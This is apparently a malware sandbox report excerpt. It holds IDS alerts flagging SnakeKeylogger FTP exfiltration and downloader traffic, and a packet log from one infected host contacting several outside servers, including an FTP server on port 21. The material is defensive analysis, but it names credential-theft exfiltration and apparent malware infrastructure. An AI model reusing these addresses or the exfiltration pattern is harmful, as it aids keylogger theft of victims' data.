                                                            2024-10-03T09:16:15.593851+02002845532ETPRO MALWARE SnakeKeylogger Exfil via FTP M11192.168.2.749748119.18.54.3921TCP
                                                            2024-10-03T09:16:27.343805+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749705193.122.130.080TCP
                                                            2024-10-03T09:16:28.390677+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749705193.122.130.080TCP
                                                            2024-10-03T09:16:29.019175+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749708188.114.96.3443TCP
                                                            2024-10-03T09:16:29.596072+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749709193.122.130.080TCP
                                                            2024-10-03T09:16:31.125066+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749711193.122.130.080TCP
                                                            2024-10-03T09:16:32.281413+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749713193.122.130.080TCP
                                                            2024-10-03T09:16:33.218825+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749715193.122.130.080TCP
                                                            2024-10-03T09:16:34.012434+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749716188.114.96.3443TCP
                                                            2024-10-03T09:16:35.130195+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749717132.226.8.16980TCP
                                                            2024-10-03T09:16:35.738427+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749719188.114.96.3443TCP
                                                            2024-10-03T09:16:37.734532+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749722132.226.8.16980TCP
                                                            2024-10-03T09:16:39.000117+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749721132.226.8.16980TCP
                                                            2024-10-03T09:16:40.625110+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749726132.226.8.16980TCP
                                                            2024-10-03T09:16:41.179897+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749728188.114.96.3443TCP
                                                            2024-10-03T09:16:43.078198+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749721132.226.8.16980TCP
                                                            2024-10-03T09:16:43.623130+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749730188.114.96.3443TCP
                                                            2024-10-03T09:16:45.015722+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749731132.226.8.16980TCP
                                                            2024-10-03T09:16:45.677275+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749732188.114.96.3443TCP
                                                            2024-10-03T09:16:48.759459+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749735188.114.96.3443TCP
                                                            2024-10-03T09:16:54.749860+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749743188.114.96.3443TCP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 3, 2024 09:16:26.721208096 CEST4970580192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:26.726375103 CEST8049705193.122.130.0192.168.2.7
                                                            Oct 3, 2024 09:16:26.726449966 CEST4970580192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:26.726809978 CEST4970580192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:26.731622934 CEST8049705193.122.130.0192.168.2.7
                                                            Oct 3, 2024 09:16:27.191643953 CEST8049705193.122.130.0192.168.2.7
                                                            Oct 3, 2024 09:16:27.199314117 CEST4970580192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:27.204387903 CEST8049705193.122.130.0192.168.2.7
                                                            Oct 3, 2024 09:16:27.298789978 CEST8049705193.122.130.0192.168.2.7
                                                            Oct 3, 2024 09:16:27.343805075 CEST4970580192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:27.415430069 CEST49706443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:27.415467978 CEST44349706188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:27.415793896 CEST49706443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:27.489902020 CEST49706443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:27.489939928 CEST44349706188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:27.952193975 CEST44349706188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:27.952280045 CEST49706443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:27.971955061 CEST49706443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:27.971991062 CEST44349706188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:27.973074913 CEST44349706188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:28.015707016 CEST49706443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:28.100166082 CEST49706443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:28.147437096 CEST44349706188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:28.205713034 CEST44349706188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:28.205833912 CEST44349706188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:28.206033945 CEST49706443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:28.234287024 CEST49706443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:28.241403103 CEST4970580192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:28.246465921 CEST8049705193.122.130.0192.168.2.7
                                                            Oct 3, 2024 09:16:28.342165947 CEST8049705193.122.130.0192.168.2.7
                                                            Oct 3, 2024 09:16:28.390676975 CEST4970580192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:28.398412943 CEST49708443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:28.398461103 CEST44349708188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:28.398597002 CEST49708443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:28.410903931 CEST49708443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:28.410928011 CEST44349708188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:28.872119904 CEST44349708188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:28.905817986 CEST49708443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:28.905841112 CEST44349708188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:29.019217014 CEST44349708188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:29.019345045 CEST44349708188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:29.019459963 CEST49708443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:29.020028114 CEST49708443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:29.025202036 CEST4970580192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:29.027329922 CEST4970980192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:29.030493021 CEST8049705193.122.130.0192.168.2.7
                                                            Oct 3, 2024 09:16:29.030561924 CEST4970580192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:29.032222986 CEST8049709193.122.130.0192.168.2.7
                                                            Oct 3, 2024 09:16:29.035584927 CEST4970980192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:29.045275927 CEST4970980192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:29.050235033 CEST8049709193.122.130.0192.168.2.7
                                                            Oct 3, 2024 09:16:29.520260096 CEST8049709193.122.130.0192.168.2.7
                                                            Oct 3, 2024 09:16:29.596071959 CEST4970980192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:29.600321054 CEST49710443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:29.600375891 CEST44349710188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:29.600976944 CEST49710443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:29.761765003 CEST49710443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:29.761814117 CEST44349710188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:30.225670099 CEST44349710188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:30.293953896 CEST49710443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:30.324580908 CEST49710443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:30.324609995 CEST44349710188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:30.431740999 CEST44349710188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:30.431857109 CEST44349710188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:30.431920052 CEST49710443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:30.457736969 CEST49710443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:30.523538113 CEST4970980192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:30.526504040 CEST4971180192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:30.531493902 CEST8049711193.122.130.0192.168.2.7
                                                            Oct 3, 2024 09:16:30.531577110 CEST4971180192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:30.533427954 CEST4971180192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:30.538557053 CEST8049711193.122.130.0192.168.2.7
                                                            Oct 3, 2024 09:16:30.540883064 CEST8049709193.122.130.0192.168.2.7
                                                            Oct 3, 2024 09:16:30.540966034 CEST4970980192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:30.994785070 CEST8049711193.122.130.0192.168.2.7
                                                            Oct 3, 2024 09:16:30.996088028 CEST49712443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:30.996151924 CEST44349712188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:30.996226072 CEST49712443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:30.996475935 CEST49712443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:30.996488094 CEST44349712188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:31.125066042 CEST4971180192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:31.470777988 CEST44349712188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:31.486148119 CEST49712443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:31.486188889 CEST44349712188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:31.626004934 CEST44349712188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:31.626106024 CEST44349712188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:31.626178026 CEST49712443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:31.626636028 CEST49712443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:31.632611990 CEST4971180192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:31.634700060 CEST4971380192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:31.637892008 CEST8049711193.122.130.0192.168.2.7
                                                            Oct 3, 2024 09:16:31.638106108 CEST4971180192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:31.639525890 CEST8049713193.122.130.0192.168.2.7
                                                            Oct 3, 2024 09:16:31.639595985 CEST4971380192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:31.639698982 CEST4971380192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:31.644488096 CEST8049713193.122.130.0192.168.2.7
                                                            Oct 3, 2024 09:16:32.105354071 CEST8049713193.122.130.0192.168.2.7
                                                            Oct 3, 2024 09:16:32.106687069 CEST49714443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:32.106731892 CEST44349714188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:32.107115984 CEST49714443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:32.107115984 CEST49714443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:32.107155085 CEST44349714188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:32.281413078 CEST4971380192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:32.561393023 CEST44349714188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:32.563520908 CEST49714443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:32.563555002 CEST44349714188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:32.707818031 CEST44349714188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:32.707946062 CEST44349714188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:32.708434105 CEST49714443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:32.709155083 CEST49714443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:32.713291883 CEST4971580192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:32.713294983 CEST4971380192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:32.718117952 CEST8049715193.122.130.0192.168.2.7
                                                            Oct 3, 2024 09:16:32.718259096 CEST4971580192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:32.718395948 CEST8049713193.122.130.0192.168.2.7
                                                            Oct 3, 2024 09:16:32.718421936 CEST4971580192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:32.718499899 CEST4971380192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:32.723407984 CEST8049715193.122.130.0192.168.2.7
                                                            Oct 3, 2024 09:16:33.174551010 CEST8049715193.122.130.0192.168.2.7
                                                            Oct 3, 2024 09:16:33.181967974 CEST49716443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:33.181982994 CEST44349716188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:33.182063103 CEST49716443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:33.182465076 CEST49716443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:33.182481050 CEST44349716188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:33.218825102 CEST4971580192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:33.640532970 CEST44349716188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:33.710621119 CEST49716443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:33.710669041 CEST44349716188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:34.012458086 CEST44349716188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:34.012588978 CEST44349716188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:34.012661934 CEST49716443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:34.025079966 CEST49716443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:34.099883080 CEST4971580192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:34.105108023 CEST8049715193.122.130.0192.168.2.7
                                                            Oct 3, 2024 09:16:34.105175018 CEST4971580192.168.2.7193.122.130.0
                                                            Oct 3, 2024 09:16:34.110161066 CEST4971780192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:34.115242004 CEST8049717132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:34.115329027 CEST4971780192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:34.121454954 CEST4971780192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:34.126486063 CEST8049717132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:35.101963043 CEST8049717132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:35.103077888 CEST49719443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:35.103138924 CEST44349719188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:35.103203058 CEST49719443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:35.103507996 CEST49719443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:35.103523016 CEST44349719188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:35.130139112 CEST8049717132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:35.130194902 CEST4971780192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:35.582861900 CEST44349719188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:35.610723972 CEST49719443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:35.610771894 CEST44349719188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:35.635366917 CEST4972180192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:35.640348911 CEST8049721132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:35.640722990 CEST4972180192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:35.643624067 CEST4972180192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:35.648864985 CEST8049721132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:35.738507032 CEST44349719188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:35.738760948 CEST44349719188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:35.738821030 CEST49719443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:35.739197016 CEST49719443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:35.742619991 CEST4971780192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:35.744379997 CEST4972280192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:35.753443003 CEST8049717132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:35.753693104 CEST4971780192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:35.755192995 CEST8049722132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:35.755270958 CEST4972280192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:35.755408049 CEST4972280192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:35.763582945 CEST8049722132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:37.442477942 CEST8049721132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:37.446181059 CEST4972180192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:37.451191902 CEST8049721132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:37.599014044 CEST8049722132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:37.600245953 CEST49725443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:37.600297928 CEST44349725188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:37.600481033 CEST49725443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:37.600754976 CEST49725443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:37.600768089 CEST44349725188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:37.734532118 CEST4972280192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:38.056952953 CEST44349725188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:38.084228992 CEST49725443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:38.084269047 CEST44349725188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:38.205907106 CEST44349725188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:38.206027985 CEST44349725188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:38.206104040 CEST49725443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:38.206629992 CEST49725443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:38.209610939 CEST4972280192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:38.210896969 CEST4972680192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:38.214941025 CEST8049722132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:38.215055943 CEST4972280192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:38.216506004 CEST8049726132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:38.216598034 CEST4972680192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:38.216753006 CEST4972680192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:38.221549034 CEST8049726132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:38.949093103 CEST8049721132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:39.000117064 CEST4972180192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:40.139075994 CEST49727443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:40.139139891 CEST44349727188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:40.139211893 CEST49727443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:40.150933981 CEST49727443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:40.150969028 CEST44349727188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:40.578283072 CEST8049726132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:40.579687119 CEST49728443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:40.579732895 CEST44349728188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:40.579801083 CEST49728443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:40.580058098 CEST49728443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:40.580075979 CEST44349728188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:40.625109911 CEST4972680192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:40.626519918 CEST44349727188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:40.626590014 CEST49727443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:40.628673077 CEST49727443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:40.628691912 CEST44349727188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:40.629091978 CEST44349727188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:40.671983004 CEST49727443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:40.759648085 CEST49727443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:40.803406954 CEST44349727188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:40.870134115 CEST44349727188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:40.870245934 CEST44349727188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:40.870338917 CEST49727443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:40.875400066 CEST49727443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:40.879057884 CEST4972180192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:40.883966923 CEST8049721132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:41.043975115 CEST44349728188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:41.045605898 CEST49728443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:41.045634031 CEST44349728188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:41.180036068 CEST44349728188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:41.180155993 CEST44349728188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:41.180219889 CEST49728443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:41.180641890 CEST49728443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:41.205063105 CEST49729443192.168.2.7149.154.167.220
                                                            Oct 3, 2024 09:16:41.205112934 CEST44349729149.154.167.220192.168.2.7
                                                            Oct 3, 2024 09:16:41.205169916 CEST49729443192.168.2.7149.154.167.220
                                                            Oct 3, 2024 09:16:41.205652952 CEST49729443192.168.2.7149.154.167.220
                                                            Oct 3, 2024 09:16:41.205667019 CEST44349729149.154.167.220192.168.2.7
                                                            Oct 3, 2024 09:16:41.850087881 CEST44349729149.154.167.220192.168.2.7
                                                            Oct 3, 2024 09:16:41.850199938 CEST49729443192.168.2.7149.154.167.220
                                                            Oct 3, 2024 09:16:41.853355885 CEST49729443192.168.2.7149.154.167.220
                                                            Oct 3, 2024 09:16:41.853368998 CEST44349729149.154.167.220192.168.2.7
                                                            Oct 3, 2024 09:16:41.853750944 CEST44349729149.154.167.220192.168.2.7
                                                            Oct 3, 2024 09:16:41.855554104 CEST49729443192.168.2.7149.154.167.220
                                                            Oct 3, 2024 09:16:41.899430037 CEST44349729149.154.167.220192.168.2.7
                                                            Oct 3, 2024 09:16:42.097129107 CEST44349729149.154.167.220192.168.2.7
                                                            Oct 3, 2024 09:16:42.097198963 CEST44349729149.154.167.220192.168.2.7
                                                            Oct 3, 2024 09:16:42.097311974 CEST49729443192.168.2.7149.154.167.220
                                                            Oct 3, 2024 09:16:42.101592064 CEST49729443192.168.2.7149.154.167.220
                                                            Oct 3, 2024 09:16:43.025032997 CEST8049721132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:43.027307987 CEST49730443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:43.027352095 CEST44349730188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:43.027631998 CEST49730443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:43.027744055 CEST49730443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:43.027751923 CEST44349730188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:43.078197956 CEST4972180192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:43.493618965 CEST44349730188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:43.497294903 CEST49730443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:43.497314930 CEST44349730188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:43.623142004 CEST44349730188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:43.623255968 CEST44349730188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:43.626185894 CEST49730443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:43.626581907 CEST49730443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:43.629966021 CEST4972180192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:43.631031990 CEST4973180192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:43.635459900 CEST8049721132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:43.636024952 CEST8049731132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:43.636116028 CEST4972180192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:43.636138916 CEST4973180192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:43.636306047 CEST4973180192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:43.641112089 CEST8049731132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:44.963219881 CEST8049731132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:45.005727053 CEST49732443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:45.005784035 CEST44349732188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:45.006259918 CEST49732443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:45.006326914 CEST49732443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:45.006335974 CEST44349732188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:45.015722036 CEST4973180192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:45.471312046 CEST44349732188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:45.515868902 CEST49732443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:45.570663929 CEST49732443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:45.570683956 CEST44349732188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:45.677278042 CEST44349732188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:45.677385092 CEST44349732188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:45.677582026 CEST49732443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:45.684572935 CEST49732443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:45.690495014 CEST4973380192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:45.695463896 CEST8049733132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:45.695560932 CEST4973380192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:45.695868969 CEST4973380192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:45.700841904 CEST8049733132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:47.293956995 CEST4972680192.168.2.7132.226.8.169
                                                            Oct 3, 2024 09:16:48.158533096 CEST8049733132.226.8.169192.168.2.7
                                                            Oct 3, 2024 09:16:48.159317017 CEST4973421192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:16:48.160248041 CEST49735443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:48.160284042 CEST44349735188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:48.160348892 CEST49735443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:48.160573006 CEST49735443192.168.2.7188.114.96.3
                                                            Oct 3, 2024 09:16:48.160586119 CEST44349735188.114.96.3192.168.2.7
                                                            Oct 3, 2024 09:16:48.166676998 CEST2149734119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:16:48.166750908 CEST4973421192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:16:48.168709993 CEST4973421192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:16:48.173671961 CEST2149734119.18.54.39192.168.2.7
                                                            Oct 3, 2024 09:16:48.173739910 CEST4973421192.168.2.7119.18.54.39
                                                            Oct 3, 2024 09:16:48.203253984 CEST4973380192.168.2.7132.226.8.169
